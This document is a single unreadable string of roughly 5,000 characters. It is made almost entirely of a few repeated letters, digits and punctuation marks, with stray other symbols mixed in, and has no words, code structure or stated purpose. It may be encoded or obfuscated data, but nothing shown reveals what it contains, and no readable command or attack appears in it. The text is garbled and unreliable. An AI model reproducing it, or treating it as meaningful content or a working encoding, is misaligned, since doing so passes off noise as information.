=q:SdiU-5/qJi4-fiqU:x515qU1Sf4-U/Jxq1qSS144<(U:iUJ1-5xJ/P5f4d-UUJU5/x5i-qJ:P4iUi/JSS1iy5if4xU5d15J1:ii(1:/fqxx5xq45>4Ui(d(-S1>qw(JSx-l41U//j5S1-SJf:m5/5dd5xJ5iUq(a4/.xS1dx:iJhi:4/dxd1:UJ(uSUf(3q/q:51iqiixqU-ifJx:/iS55fqx-:41U1/:Sh11md(q4-U/dd5dJii5qJ-q/qx//dSq5U4-i14qUS1xS41S_J-5dU/i1-55(:b/(-:-fqJBU-S(5/4J-J4/xqU1Sd5Cid-/:-/-UJ1SSx(/qqd:/5x55UxSQ44U:J/qxq1Sx4(JSUfid5U:d-S15/4>(1:x--J-J5(-iSi/f:/-/S/<q4S-q4-141Ux/-q4SUidfUd4Ud1-1-JJ5x4S!U:5UxxSqiq5f--q:J-:18SY1d9((x:S-Ux-5#S4(xA<::dxU//q1dioq54/:5/i1U5i(544-fNxUiJ/5/(f5Ufx41fxJ4U-Si51VJ:x:5UiJ11x(q4xi2siU-d(SJ(fi445f4/UJ4Jxx5C+4/:x/SxS15x0(xS/f(dxxfJUUd(1_{-fd/U/Jd/1qf5x4ii(/d:x1:xf(/4/fi,(U//Z551-SJfdI5/5dd5!J5i(qd-J/Jxf/4qt5}q/-44xUx/f5(1x}-(5k(/qJJ5fJ4V/4S:(UfJf54x/idq:-:41x4/:S_11hd(q4-/(dd5dJii1(d:4fx:(54J2(iq1-d4:Ux1xS41cWiifdd-ddx5U(-iS(:d2//Jx5SqSi5qF:4-4U(11S-15Sqi44:-UJ/Sfq5qdf-d-:/USJ5S(i^8-:(/Ux11-SESS4/=U/xU//455(5o-f5-UUJx45SJ1iU(f:D:ix/11S((x4U-5/S:q14SUq(iifqa:/S/UUdJqiJ(::--qx-551iqxo-Di4S-SJqSi(5g--U:iUxJ1UUJ5k4fU-(dixq/:q-5/44{qdJ::1q1U(mif-5d/xdx/Uqq1SdfdfqUdx(xx5/idi(Iq4qU(5nSS(:4x-edJU5dx5x1fTU(d::f1x1U_qJ514iiqdxxx14x2(xS(-U4xU:d5x4(/S-f->q/JdyU-qfi(4Uiif4xf5:q+(x4S-:dqUidS5S1/*5(J:S/S:J5x1qix(-ff/i/dxSS(iqiS:-4pxUJ(5((15i-::1US1jSWqi5:fdi1/fx(1Ux/id(J-54qU5//S/S(4/fifJdUJ/JiJ-i1i/u:/-:S15J/(:44f-:JxJ1/5SSqSS(5:i-1UiS:(f4vff--UxU1/Uq-i-qx-U45Ui/154ix#Jf1d*dUJx5x1hqxi1:/-4Uq1f5-iqfUf1:5xdd(qd(SCS-xEqxfJxS1((P(fqHfU-:x5cq1y:4JiU/Sxf5:qxix4U(Sdq-1J1xL(JS1fisq/xJx54JCixq(-(fxx:/fS/i/Ei((d/-q/-5i1d}((id:-fdd5:(YiJqx:q/-Jd5JqJixSq-d45U5/4S4Ji>---:Sf5JSUqqJS (/:ffxJ4//S1i14-if/-::1JxU11YJ-d:(-JJ/Sx(:iS-!:xU4J-UgqD514iiq/%xsdqSSS4zSiU:OUxxSJJifi-iifSf:J55fqfi(q-:xd(J_5:q:i-Sx-)#(U/1f55J1*Jiq:i-4xiU1q1(ff1:--q/5115-1Uo(W14xUU/45i11iff4f1dUU0S:qJ(/(jii/-:(1f51(mixfU-J/1JfU5(UcU(S:5fiJ-U(q14vf5:x/ix:J(q/5:(S-Uff/:5:SUSSi/-f/fx/:iS/qqiqfJi(/d/4/iS(5U4/A4d(/f1554(J4-44-d-Ud/511d4&4UfiU1Jdx5qbqiqf:Udqxi5-q-ifSUfi4dUdd5S:1d)1qi:-U-xS/5qS51(t-Sffxf/Sq41iqf-4d5xdJ1Ux(ql--ddJUJJx/qqd5-45:U/F-i5:S1iSfu:8di-:1dU1(fG(fU3iU5J4S-(UNUf/i5/fdS1Jqd((q/ix4S-i1dS5(f_--4*xU//55U1fqq4i-:d:xxJ-15q/Si:4/U-x14xS(:45-5:S:ix:S4q(q:fx:(/dx/5:x5i:4/444ix41fq:(J_5-U/f-x14SU1Ir4--:i/UJ55-qSi(q5ii/5x45-qUiU4/(5:qd/xf1qJ1Gff(:Ufi/:5xq(id4/::45x1U(S15dK4-1-fdx5ASdSJiLiqd4UUx(1iqq5:f54U/-:(J^5SiJfd41/fdxUqJ/(14&fU:xU/:q5q5DiS(U:U:iJU5A11qx4UfNfix-1JSt(4?i(/dx:JJdxPSd(Jf5f4::/5J/5fSx4S:fdJU11xUi(x41-/:(xfJ1S-(d51fJ:df5J5UdJ15q(3i(/:x114SfijSUf5f1xfd5551dS:-14w--d/SxJU(S(d-:ff::/UxS1i(:-xd(UdJ/S:J5LSi(:1-dJ(Jxq4(-fS:UU/UUUqS55/i-45://U1/1-5i4/(5:SU(J15f(/i(fU:Jf/:111Jdq/4qf//S/qJ1JqS4S1((d/:xJSUSq1SdfdfqUdx(xx5/idi(ifd1x/JixU(q4-f1:5UJd_5J(5eU4id-/5J:5/x5i-qJ-xf-Ui//SJ(JS/f(ZSx-J151(/55-V:/UxJS5Sq55Ff4i/d(x11-Jqi-(dfi4JUi/i5S(x74(2:iUdxS1qq55f4JA:/J:11:14(iqf--4(xUx451SS4d-ldi/?dU5/JqiJ(--5fJx/U4qJ((f4fJ-qdxx-1/1UqS-Td//qx(5SJ-iSf(:1/fJ/1(qUiJS(:-4S:t1/SS(-,:-f3JU1d55/5fi((Jd4//JJ145dqti54(4(U1/xS:11N5i/d/d(1/5i5J(Uf/fifixSUU5J(dff:(:-x5x41/1qq-fi4dU//455qsEU4x:idi14JdJ1iU(ff(-(/NJx5xSx4/+(4x-qJ5x/qf%5G-fJx4J/J1S45Si4-(f:xdU)5Sid(q4-/5xox:151/q5-d:5Uq14S4(?5q4Srd/::iJxq0(:i4:1:5dUx:xd114Y7r:qUJJfxS(=Y/4q-(/S:-1q1/I_f4:Ud1d-1USq(:?d--k1U:/q5J1:7q{U:7dfJ55/(d(/q4:H//UqJ(SS1-<S-(d1Uf1/5((UmJq(:-fSd&5/qSi-4::f4JxxUSqs1qq4V/d1xCJU5x(/5qfdfFU:d4Ud11i(f:-5dSx1/4qxS:4Ki5d5/-15S:5((Sf5-::-JU5qq:idf-i1/Jdq/5S15444i5dx:-1-15i-RSR/-:U-USUSqJS:9i:/Ux/S1JSUcf(ii14(-i1Tx5qU4a,xf(x/J5JiS/i/f43S/UUx1SSJ<Uf-://x:f/dx1((({-:d1U4JfSLJUFxi1::f5x5Udqf5qfx-:/J/f1U5dSifGi/d--(xf1x(Uq(f:f//(x5U:1Jiqf--1d5xJ/.SxS-q4i:4SUx/-S-S54-fSf/d:J-JSJJi441Y4/4:51xJ-((ii--dmx(11Sq(iSJ(Sf4UfJfUU(jqfid:4fSJdxiSxq1f--(/q/(/fq;(UaU--kxU:J:UJ(&q:iU::fJJU1(S(i1Si::d1xS58q%(iS:fS4:U-d(SUS4i1kSddU}Ji1^1/i-4q:UdS-115Jq(Jq:-:-Sx:JqJUSdn:;q4SUx/:5gJ5y:i(-U:JJf1qqSqq(--LdSUd/i5S(/4tfd:S/Sd4511SSi45G//xJ:xfqqq(i(4S/d-S11S4(4Kq(fdU/qJiS-(-3fqi:/-1dq1JJ:iqiU-;:fx51/qdq/S1fddd/(dd5dJq5(4i%1/1Uf51q-Sqi5-1:-:/1bx5i:((fU-JxfJqSSSqS4(::qU-:S1SJ:5d4/u4/1/:Jq1iix4-:f:--qJUxf(5(d4(-LUJJ:S-S:5xq54&dqxJ1fJSi/%S-(/fxf14U/qiS1cJf-dSU-545((xidiidi:J1(JL(SqU:/-4/fUJ5a(xY/4fDq-4dfS4J555ffRxf:xdU05Sid(q4-/5xHx:15q5z/i4:1dS1f5SSx(di1:SfU:1/q1f(i45-:f(xf1x5i(bQ((d/f:xJSxS(+T/4q-(/S:-1Sq(i14f:/d(xU1JU(i4SS-d4-UJJi5/qUVdqS:--qx(1(J-iSfl:x4Uxx//q:(5l5-UGSUq/iSi18S:iJ:1/1:i5x11Sq4Jz:/q/U1B5fi54/:d:/-11x5iqi}5(mdd/5JqS4(4!.qSii-/x-1iSxSf6i-5d::(J1J/(fSq4--UdSU414S-Kx;UNfd(:S1xx((iq1-1:fx11-JqS5214-4-U8d5JqSJE/-ffU/i/dx1J45U4-iJd1:dJi5:(5iS--:-xdUJU(q5S/4fff::USJS1Si1ifiSf4xU/JSd5I4E4x/TUJU-14(K(J(/45/x:(5UJdi5f4-xdJxUd(S/S4SJ(Sd-Ui1dU/(UqJ(U:x--J-J5(-iSi/f:/-/S/5S11iqd(id--fJJSUJ5I-i(:J-ddx5-J((:!xfq:fUfJ:qJqxq--f4qxf/-Sx1/hd-4:1fJJ(5:(/a1f1:J4(x/UiSSix44n5dixdJS5q(5SffSfdf(J:UiqJWJf4:JddJUJiq15:ffi14SU:/iJU1i.&i5ff-:dJUSi:q/ffrq/qUd5qq/qbi(-q:/-11JSi(/wU-d{SU:/iS-5-)Ufq::/dJ-/1q-!df4-J/qxd1(qp1d4:-s4/-i/fxd1-_ifddUU5J551(1S_(-</Ux:11UJf((iQ-i:FxJ1GJS(1SU(JhxfidUUSJiSf(<-i/5x:/-qfixZi-^d(-dJ(q (SI:-xd{UJJ5U*qUi5(4,d/5J41xSJiUS(-f-4Jf5UJx(S4ffJ:1Ux:i5q5f4--x4J/qJ-11S5iJqz-x--J:5JJ1((4:f5:SU1d4SU5:4dfx>S/:df5Uqdi5q(-1Udd/11qy(UTx-/,qUdUgS:14Sdf5d4/xxJ5Ux(iJi4dfUUx-1iqd1/4dMJdd:{1?1xi8jJn--4U_UJUJqd5-41:x4Sx554Sx(J4U((ddd4J1xf1/q5fidd/Sxq55Jfi1i-::/::J1x1:SU4-i(:1x-U514iJt(4f-J-:1f5JqJ?dq1:f-q:51JJ45dfqli4xJ-5xxU5SYJ--dqUfJJ5JJ(iqiJ4S/xd-JdS4i(f14i/UdqxfxJiU?(f(d1fiJ(S:q5iSf1l4Uf/:1SJd5J((-idi-S1/xf(/4/fiF(UU/f1J(f(/Kxd5:SU-J/JUix(--q/qxd1q5Ji53--(4xx4dixd1-Sq(1:4-S/-UJJ15xq(}-U4xx1xq:1J41,Sdx:-x4q:(-ki4:-4:SxdUx(45ii::4]
